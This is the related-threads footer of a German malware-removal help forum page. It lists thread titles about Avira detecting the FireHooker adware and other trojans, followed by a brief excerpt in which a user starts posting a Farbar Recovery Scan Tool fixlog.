Ähnliche Themen: Windows 10: Avira findet nach dem PC Start TR/AD.FireHooker


  1. Avira meldet TR/AD Firehooker.BU - auch hier
    Log-Analyse und Auswertung - 09.10.2020 (19)
  2. Windows 10: Avira erkennt nach jedem Hochfahren den Trojaner "TR/AD.FireHooker.BU"
    Log-Analyse und Auswertung - 07.10.2020 (15)
  3. Win10: Avira findet Trojaner (TR/AD.FireHooker.BU) und weitere Funde von Malwarybytes und Roguekiller
    Plagegeister aller Art und deren Bekämpfung - 06.10.2020 (28)
  4. TR/AD.FireHooker.BU wird nach jedem Hochfahren von Avira erkannt
    Log-Analyse und Auswertung - 06.10.2020 (18)
  5. Windows 7: Avira findet nach Entpacken W32/Ramnit.C in .exe-Datei
    Log-Analyse und Auswertung - 27.04.2018 (7)
  6. Win 7: Kaspersky findet Trojan.Win32.FireHooker.a und evtl. mehr
    Log-Analyse und Auswertung - 03.10.2016 (20)
  7. TR/Firehooker.1825 Infektion gefunden von Avira
    Plagegeister aller Art und deren Bekämpfung - 19.12.2015 (15)
  8. TR/FireHooker.1825 wird von AVIRA nicht entfernt
    Plagegeister aller Art und deren Bekämpfung - 18.12.2015 (18)
  9. TR/FireHooker.1825 von AVIRA gefunden
    Plagegeister aller Art und deren Bekämpfung - 17.12.2015 (21)
  10. Windows7: AVIRA meldet TR/FireHooker.1825
    Log-Analyse und Auswertung - 17.12.2015 (13)
  11. TR/FireHooker.1825 von AVIRA gefunden
    Plagegeister aller Art und deren Bekämpfung - 16.12.2015 (17)
  12. Windows 7: Antivir findet immer wieder Trojaner Firehooker
    Log-Analyse und Auswertung - 14.12.2015 (11)
  13. TR/FireHooker.1825 von AVIRA gefunden
    Plagegeister aller Art und deren Bekämpfung - 07.12.2015 (14)
  14. Abstürzen einige Minuten nach Start, Bildschirm schwarz, kurzer Surrton, Avira Meldung: avira.systray.exe ungültiges Bild
    Plagegeister aller Art und deren Bekämpfung - 26.09.2015 (5)
  15. Windows 7: Avira findet TR/Emotet.A.67 nach Telekom-Rechnung
    Log-Analyse und Auswertung - 28.12.2014 (9)
  16. Windows 7: Norton findet fast bei jedem Windows-Start ntdllinst.exe und ntcrxinst.exe
    Log-Analyse und Auswertung - 04.09.2014 (24)
  17. XP Fehlermeldung nach Start - je 2 Funde mit Avira + MBAM
    Log-Analyse und Auswertung - 01.12.2013 (21)

Zum Thema Windows 10: Avira findet nach dem PC Start TR/AD.FireHooker - Dankeschön! Hier der Fixlog: Code: Alles auswählen Aufklappen ATTFilter Entfernungsergebnis von Farbar Recovery Scan Tool (x64) Version: 04-10-2020 durchgeführt von Tamy (04-10-2020 21:48:26) Run:2 Gestartet von C:\Users\Tamy\Desktop Geladene Profile: Tamy - Windows 10: Avira findet nach dem PC Start TR/AD.FireHooker...
Archiv
Du betrachtest: Windows 10: Avira findet nach dem PC Start TR/AD.FireHooker auf Trojaner-Board

Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.